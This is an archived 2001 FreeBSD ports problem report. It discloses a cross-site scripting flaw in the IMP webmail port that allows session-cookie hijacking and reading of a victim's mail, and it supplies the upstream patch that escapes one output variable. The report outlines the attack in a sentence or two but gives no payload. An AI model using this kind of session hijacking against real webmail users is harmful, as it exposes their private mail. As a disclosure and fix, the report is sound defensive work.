Date: Sat, 10 Nov 2001 01:55:54 +0100 (CET) From: Thierry Thomas <thierry@thomas.as> To: FreeBSD-gnats-submit@freebsd.org Cc: Kris Kennaway <kris@freebsd.org> Subject: ports/31889: Port mail/imp: security-update - webmail session hijacking vulnerability Message-ID: <20011110005554.1F72C751E@graf.pompo.net>
next in thread | raw e-mail | index | archive | help
>Number: 31889 >Category: ports >Synopsis: Port mail/imp: security-update - webmail session hijacking vulnerability >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: maintainer-update >Submitter-Id: current-users >Arrival-Date: Fri Nov 09 17:00:02 PST 2001 >Closed-Date: >Last-Modified: >Originator: Thierry Thomas >Release: FreeBSD 4.4-STABLE i386 >Organization: Kabbale Eros >Environment: System: FreeBSD graf.pompo.net 4.4-STABLE FreeBSD 4.4-STABLE #0: Sat Sep 22 10:41:40 CEST 2001 root@graf.pompo.net:/usr/obj/mntsrc/src/sys/GRAF010429 i386 >Description: - It's possible to hijack an imp/horde session using a cross-site script attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper. - After hijacking the cookies, the attacker can use the session and read the victim's mail. [Original mail from Joao Pedro Goncalves <megas@phibernet.org> - see CERT advisory on cross-site scripting http://www.cert.org/advisories/CA-2000-02.html ] >How-To-Repeat: Don't try to repeat it ;-) >Fix: The following patch has been issued by the Horde team: diff -urN imp.orig/Makefile imp/Makefile --- imp.orig/Makefile Sat Oct 13 23:48:59 2001 +++ imp/Makefile Sat Nov 10 01:37:34 2001 @@ -8,7 +8,7 @@ PORTNAME= imp PORTVERSION= 2.2.6 -PORTREVISION= 1 +PORTREVISION= 2 CATEGORIES= mail www MASTER_SITES= ftp://ftp.horde.org/pub/imp/tarballs/ diff -urN imp.orig/files/patch-aa imp/files/patch-aa --- imp.orig/files/patch-aa Thu Jan 1 01:00:00 1970 +++ imp/files/patch-aa Sat Nov 10 01:31:29 2001 @@ -0,0 +1,23 @@ +--- status.php3.orig Mon Nov 13 22:35:30 2000 ++++ status.php3 Sat Nov 10 01:26:38 2001 +@@ -4,9 +4,9 @@ + + File: status.php3 + $Author: chuck $ +- $Revision: 2.7.2.22 $ +- $Date: 2000/11/13 21:35:30 $ +- ++ $Revision: 2.7.2.23 $ ++ $Date: 2001/11/09 16:47:06 $ ++ + IMP: Copyright 1998, 1999, 2000 by Charles J. Hagenbuch <chuck@horde.org> + + You should have received a copy of the GNU Public +@@ -45,6 +45,7 @@ + page_close(); + if (isset($imp)) $imp->unpickle(); + $title = $lang->status_title; ++$message = htmlspecialchars($message); + + /* doctype */ + require "$default->include_dir/doctype.inc"; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011110005554.1F72C751E>